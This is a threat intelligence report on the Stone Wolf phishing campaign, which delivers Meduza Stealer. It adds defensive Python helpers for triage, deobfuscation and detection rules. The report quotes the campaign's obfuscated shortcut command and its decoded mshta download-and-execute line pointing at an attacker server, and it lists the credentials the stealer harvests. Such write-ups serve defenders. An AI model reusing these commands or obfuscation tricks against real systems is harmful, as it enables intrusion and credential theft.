Stone Wolf employs Meduza Stealer to hack Russian companies
BI.ZONE Threat Intelligence reports an increase in criminal activity employing commercial malware available on underground resources. Recently, the researchers identified a malicious campaign by a cluster later dubbed Stone Wolf. The adversaries send out phishing emails on behalf of a legitimate provider of industrial automation solutions. The goal of the attackers is to deliver Meduza Stealer into the infrastructures they are interested in.
Cybercriminals often disseminate phishing emails on behalf of large, well‑known organizations. Recognizable logos and other elements of a brand's visual identity help adversaries gain user trust and increase the chance that a malicious message will be opened. It is important to remember that the brands cannot be held liable for the actions of cybercriminals or the associated damage.
- Adversaries continue to use archives with both malicious files and legitimate attachments which serve to distract the victim. This fact underscores the importance of raising awareness of adversary methods.
- By using the names and data of real organizations, attackers have a greater chance of tricking their victims into downloading and opening malicious attachments. This tendency indicates the need for employees to undergo regular cybersecurity training.
- Attackers keep on expanding their arsenal of commercial malware. This once again highlights the importance of monitoring underground resources.
The adversaries disseminate an archive named Dostavka_Promautomatic.zip. The archive contains:
- a .p7s digital signature file
- a legitimate .docx document used as a decoy
- Scan_127-05_24_dostavka_13.05.2024.pdf.url, a malicious link to Meduza Stealer
Decoy document
Opening the malicious link triggers the loading and execution of a file hosted on a remote SMB server.
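The .url file is an INI-formatted Internet Shortcut, and a target such as a UNC path or a file:// URL with a host part makes Explorer fetch the target over SMB (or WebDAV) when the user double-clicks it. The following triage helper is an added example, not code from BI.ZONE or from the campaign; the sample .url content is constructed, because the article does not reproduce the real file, and the UNC target is an assumption that merely reuses the C2 address quoted later in the article.

```python
import configparser
from urllib.parse import urlsplit

# Constructed .url file. The article does not reproduce the real one; the UNC
# target below is an assumption that only reuses the C2 address quoted in the text.
SAMPLE_URL_FILE = """[InternetShortcut]
URL=file://193.124.33.71/share/Scan_127-05_24_dostavka_13.05.2024.lnk
IconIndex=0
"""


def parse_internet_shortcut(text: str) -> dict:
    """Return the key/value pairs of the [InternetShortcut] section (keys lower-cased)."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text.lstrip("\ufeff"))  # tolerate a UTF-8 BOM written by Windows
    section = next((s for s in cp.sections() if s.lower() == "internetshortcut"), None)
    if section is None:
        raise ValueError("no [InternetShortcut] section")
    return dict(cp[section])


def classify_target(url: str) -> str:
    """'remote-file' for UNC or file:// targets on another host, 'local-file', 'web' or 'other'."""
    if url.startswith("\\\\"):  # raw UNC path without a scheme
        return "remote-file"
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme == "file":
        # file:///C:/... has an empty netloc; file://host/share/... does not
        return "remote-file" if parts.netloc else "local-file"
    if scheme in ("http", "https"):
        return "web"
    return "other"


def remote_host(url: str):
    """Host that Explorer would contact over SMB/WebDAV to resolve the target, or None."""
    if url.startswith("\\\\"):
        return url[2:].split("\\", 1)[0]
    parts = urlsplit(url)
    if parts.scheme.lower() == "file" and parts.netloc:
        return parts.hostname
    return None


def triage(text: str) -> dict:
    """Summarize a .url file: where it points, what kind of target that is, which host serves it."""
    fields = parse_internet_shortcut(text)
    target = fields.get("url", "")
    return {"target": target, "kind": classify_target(target), "host": remote_host(target)}


if __name__ == "__main__":
    print(triage(SAMPLE_URL_FILE))
```

A shortcut whose `kind` is `remote-file` is the case described above: the click pulls a file from another host rather than opening a web page, and the `host` value is the address worth blocking or hunting in SMB and WebDAV logs.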
The file is a Windows shortcut that runs the following command:
```powershell
SyncAppvPublishingServer.vbs ;520,526,515,527,508,443,515,527,527,523,469,458,458,460,468,462,457,460,461,463,457,462,462,457,466,460,469,462,461,460,466,458,494,510,508,521,506,460,461,466,456,459,464,506,461,463,506,511,522,526,527,508,529,518,508,506,460,462,457,459,464,457,461,459,461,463,457,512,531,512|%{$p+=[char]($_-411)};$p | powershell -
```
Subtracting 411 from every element of the array and casting the result to a character transforms the command as follows:
```powershell
SyncAppvPublishingServer.vbs ; mshta http://193.124.33[.]71:3217/Scan_127-05_24_dostavka_13.05.2024.exe | powershell -
```
SyncAppvPublishingServer.vbs is a script shipped with Windows that passes its argument to the PowerShell interpreter, so everything after the semicolon runs as PowerShell even though the shortcut launches a .vbs file. The decoded command downloads an HTA file named Scan_127-05_24_dostavka_13.05.2024.exe from the remote server and executes it with MSHTA, piping the result into the PowerShell interpreter. The HTA runs its command via WScript.Shell.Run([command]); that command contains an AES‑encrypted payload for the PowerShell interpreter, which is decrypted at runtime and executed.
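An analyst does not need PowerShell to undo this obfuscation: the integer array and the `[char]($_-N)` arithmetic can be pulled out of the command line with a regular expression and decoded offline. The script below is an added example written for this article, not code from BI.ZONE or from the campaign. It reproduces the shortcut command quoted above as constructed sample input (the trailing en dash of the quoted text is replaced by the plain hyphen that PowerShell actually receives); the rule names, the brute-force offset search and the LOLBin keyword list are the author's assumptions.

```python
import re

# Constructed sample: the shortcut command quoted in the article.
SAMPLE = (
    "SyncAppvPublishingServer.vbs ;"
    "520,526,515,527,508,443,515,527,527,523,469,458,458,460,468,462,457,460,461,"
    "463,457,462,462,457,466,460,469,462,461,460,466,458,494,510,508,521,506,460,"
    "461,466,456,459,464,506,461,463,506,511,522,526,527,508,529,518,508,506,460,"
    "462,457,459,464,457,461,459,461,463,457,512,531,512"
    "|%{$p+=[char]($_-411)};$p | powershell -"
)

# A comma-separated integer array piped into ForEach-Object (%) whose body
# casts ($_ <+|-> N) to [char]. Group 1 = the array, 2 = the sign, 3 = N.
CHAR_OFFSET_RE = re.compile(
    r"((?:\d+,){3,}\d+)\s*\|\s*%\s*\{[^}]*?\[char\]\(\s*\$_\s*([+-])\s*(\d+)\s*\)", re.I
)
URL_RE = re.compile(r"https?://[^\s'\"|;]+", re.I)
LOLBIN_RE = re.compile(
    r"\b(mshta|powershell|SyncAppvPublishingServer\.vbs|rundll32|regsvr32|cmd)\b", re.I
)


def extract_int_array(cmd: str) -> list:
    """The integer array that feeds the [char] cast, or [] if the pattern is absent."""
    m = CHAR_OFFSET_RE.search(cmd)
    return [int(n) for n in m.group(1).split(",")] if m else []


def decode_char_offset(cmd: str):
    """Undo [char]($_-N) / [char]($_+N); None when the command does not use the trick."""
    m = CHAR_OFFSET_RE.search(cmd)
    if not m:
        return None
    nums = [int(n) for n in m.group(1).split(",")]
    offset = int(m.group(3)) * (1 if m.group(2) == "+" else -1)
    return "".join(chr(n + offset) for n in nums)


def guess_offset(nums: list, max_offset: int = 1024):
    """When N is hidden in a variable, brute-force it: the right shift yields printable
    ASCII that names a LOLBin or a URL scheme. Returns (signed offset, text) or None."""
    for off in range(max_offset + 1):
        for sign in (-1, 1):
            chars = [n + sign * off for n in nums]
            if all(32 <= c < 127 for c in chars):
                text = "".join(map(chr, chars))
                if re.search(r"mshta|powershell|http|rundll32|cmd", text, re.I):
                    return sign * off, text
    return None


def defang(url: str) -> str:
    """Defang the last dot of an IPv4 host, matching the article's 193.124.33[.]71 style."""
    return re.sub(r"://(\d{1,3}\.\d{1,3}\.\d{1,3})\.(\d{1,3})", r"://\1[.]\2", url)


def analyze(cmd: str) -> dict:
    """Decoded command plus the indicators an analyst would lift from it."""
    decoded = decode_char_offset(cmd)
    haystack = cmd + " " + (decoded or "")
    return {
        "decoded": decoded,
        "urls": [defang(u) for u in URL_RE.findall(decoded or "")],
        "lolbins": sorted({w.lower() for w in LOLBIN_RE.findall(haystack)}),
    }


if __name__ == "__main__":
    print(analyze(SAMPLE))
```

The brute-force path only needs the array: for this sample every offset between 405 and 411 produces printable text, but only 411 yields a string containing `mshta` or `http`, which is why a keyword check is used as the stopping condition instead of printability alone.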
The decrypted script does the following:
- downloads the document from the remote network server http://193.124.33[.]71:3217/Scan_127-05_24_dostavka_13.05.2024.pdf and runs it
- downloads In2al5d P3in4er from the network server http://193.124.33[.]71:3217/scp231.exe and runs it
The files are saved into the folder C:\Users\[user]\AppData\Roaming. Then the script searches for the file Scan_127-05_24_dostavka_13.05.2024.pdf.url and replaces it with the downloaded PDF file, so the victim sees the expected document.
In2al5d P3in4er is used for downloading and running Meduza Stealer. This malware‑as‑a‑service offering first appeared on underground resources in June 2023. One‑month, three‑month, and lifetime subscriptions can be purchased for $199, $399, and $1,199, respectively. In March 2024, additional options became available, including the loader (presumably, In2al5d P3in4er) and a dedicated server with a range of configurable parameters (the number of cores, size of RAM, and amount of disk space).
Meduza Stealer advert in a Telegram channel
Purchasers receive a builder and a web panel that enables them to monitor data collected from victim devices. According to the Meduza Stealer developers, the executable file contains an anti‑CIS module which restricts attacks in the region. However, there is no such restriction in the malware sample obtained by the BI.ZONE Threat Intelligence team.
If the malware cannot connect to the C2 server, the program terminates.
In the compromised system, the stealer retrieves data on the operating system version, device name and time zone, RAM capacity, processor, graphics adapter, screen resolution (together with a screenshot), as well as the device's public IP address by sending a query to https://api.ipify[.]org.
The stealer also collects the following data:
- account credentials saved in Outlook
- account credentials from browsers (Chrome, Edge, Comodo, Atom, Yandex, etc.)
- account credentials from crypto wallets (Coinomi, Exodus, Ethereum, etc.)
- list of installed applications by accessing the registry hive HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
- Telegram and Steam sessions, a Discord token
- account credentials from password managers (1Password, GAuth, NordPass, etc.)
- Windows Credential Manager and Windows Vault data retrieved via WinAPI functions (VaultEnumerateVaults, VaultOpenVault)
- list of active processes retrieved via WinAPI functions (CreateToolhelp32Snapshot, Process32FirstW, Process32NextW)
The collected data is sent to the control server via TCP.
Indicators of compromise:
- 193.124.33[.]71
- 109.120.177[.]48
| Tactic | Technique | Procedure |
|---|---|---|
| Initial Access | Phishing: Spearphishing Attachment | Uses phishing emails with malicious attachments to gain initial access |
| Execution | User Execution: Malicious File | Prompts the victim to run the malicious file to initiate the compromise process |
| Execution | Command and Scripting Interpreter: PowerShell | Employs PowerShell to run commands and scripts |
| Execution | Command and Scripting Interpreter: Visual Basic | Employs VBScript to run commands and scripts |
| Defense Evasion | Deobfuscate/Decode Files or Information | Deobfuscates the commands and scripts being launched |
| Defense Evasion | Impersonation | Sends out phishing emails on behalf of a real organization |
| Defense Evasion | Masquerading: Double File Extension | Uses a double extension to masquerade the malicious file |
| Defense Evasion | System Binary Proxy Execution: Mshta | Uses MSHTA to run malicious files |
| Credential Access | Credentials from Password Stores: Credentials from Web Browsers | Retrieves authentication data from web browsers |
| Credential Access | Credentials from Password Stores: Windows Credential Manager | Retrieves authentication data from Windows Credential Manager |
| Credential Access | Credentials from Password Stores: Password Managers | Retrieves authentication data from password managers |
| Credential Access | Unsecured Credentials: Credentials In Files | Retrieves authentication data from files |
| Credential Access | Unsecured Credentials: Credentials in Registry | Retrieves authentication data from the registry |
| Discovery | Process Discovery | Collects information about the running processes |
| Discovery | System Information Discovery | Collects information about the compromised system |
| Command and Control | Non-Application Layer Protocol | Uses TCP to communicate with the C2 server |
| Command and Control | Ingress Tool Transfer | Transfers the malware to the compromised system |
| Exfiltration | Automated Exfiltration | Automatically exfiltrates the collected data |
| Exfiltration | Exfiltration Over C2 Channel | Transfers the collected data to the C2 server |
The BI.ZONE EDR rules below can help organizations detect the described malicious activity:
- win_execution_or_open_file_with_double_extension
- win_use_mshta_to_run_hta_from_url
- win_access_to_ip_detection_service
- win_possible_browser_stealer_activity
- win_suspicious_access_to_password_manager_files
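The behaviours those rule names refer to can be checked with a handful of simple conditions over process-creation, file-creation and DNS-query telemetry. The script below is an added example, not BI.ZONE's rule logic or any product's code: it defines four illustrative rules (double extension, MSHTA launched with a URL, argument injection into SyncAppvPublishingServer.vbs, and a DNS query to a public-IP echo service) and runs them over constructed Sysmon-like events. The event shape, the file paths other than those quoted in the article, the benign control event and the list of IP-echo domains are all assumptions.

```python
import re

# Constructed events in a Sysmon-like shape (1 = process create, 11 = file create,
# 22 = DNS query). Command lines follow the chain described in the article; user
# paths, the benign HTA and the IP-echo domain list are assumptions.
EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Windows\System32\SyncAppvPublishingServer.vbs" ";520,526,515|%{$p+=[char]($_-411)};$p | powershell -"',
     "parent": r"C:\Windows\explorer.exe"},
    {"id": 1, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://193.124.33.71:3217/Scan_127-05_24_dostavka_13.05.2024.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"id": 11, "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\user\AppData\Roaming\Scan_127-05_24_dostavka_13.05.2024.pdf.url"},
    {"id": 22, "image": r"C:\Users\user\AppData\Roaming\scp231.exe",
     "query": "api.ipify.org"},
    # Benign control: a local HTA opened by a user, which must not fire mshta_from_url.
    {"id": 1, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta "C:\Program Files\App\help.hta"',
     "parent": r"C:\Windows\explorer.exe"},
]

# A document-looking extension immediately followed by an executable/script one.
DOUBLE_EXT = re.compile(
    r"\.(pdf|docx?|xlsx?|jpe?g|png)\.(url|lnk|exe|scr|hta|vbs|js|bat|cmd)(?=[\s\"]|$)", re.I
)
URL_IN_CMD = re.compile(r"https?://", re.I)
IP_ECHO_SERVICES = {"api.ipify.org", "ipinfo.io", "icanhazip.com"}  # assumption


def rule_double_extension(ev: dict) -> bool:
    text = ev.get("target") or ev.get("cmdline", "")
    return ev["id"] in (1, 11) and bool(DOUBLE_EXT.search(text))


def rule_mshta_from_url(ev: dict) -> bool:
    return (ev["id"] == 1 and ev["image"].lower().endswith("mshta.exe")
            and bool(URL_IN_CMD.search(ev["cmdline"])))


def rule_syncappv_argument_injection(ev: dict) -> bool:
    # The legitimate script takes a plain server name; a ';' after the script path
    # means extra PowerShell was smuggled into its argument.
    cl = ev.get("cmdline", "").lower()
    marker = "syncappvpublishingserver.vbs"
    return ev["id"] == 1 and marker in cl and ";" in cl.split(marker, 1)[1]


def rule_ip_detection_service(ev: dict) -> bool:
    return ev["id"] == 22 and ev.get("query", "").lower() in IP_ECHO_SERVICES


RULES = {
    "double_extension": rule_double_extension,
    "mshta_from_url": rule_mshta_from_url,
    "syncappv_argument_injection": rule_syncappv_argument_injection,
    "ip_detection_service": rule_ip_detection_service,
}


def run_rules(events: list) -> list:
    """Return (rule name, event index) for every rule that matches an event."""
    hits = []
    for i, ev in enumerate(events):
        for name, fn in RULES.items():
            if fn(ev):
                hits.append((name, i))
    return hits


if __name__ == "__main__":
    for name, i in run_rules(EVENTS):
        print(f"{name}: event {i} ({EVENTS[i]['image']})")
```

In real telemetry the `syncappv_argument_injection` rule is the most reliable of the four, because the genuine use of that script never carries a semicolon in its argument; the double-extension rule needs tuning to the document types your users actually exchange.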
Adversaries can bypass preventive security solutions and penetrate the infrastructure unnoticed. It is crucial to neutralize threats before they cause significant damage to business. To protect your company against advanced threats, we recommend implementing endpoint detection and response practices; for instance, BI.ZONE EDR. The service enables early detection of attacks and immediate incident response, either automated or manual.
To stay ahead of threat actors, you need to be aware of the methods they use when attacking various infrastructures. Understanding the real threat landscape is a massive advantage against adversaries. For this purpose, we would recommend that you leverage the data from the BI.ZONE Threat Intelligence portal. The solution provides information about current attacks, threat actors, and their methods and tools. This data helps to ensure the precision of your security solutions, which in turn accelerates incident response and protects your company from the most critical threats.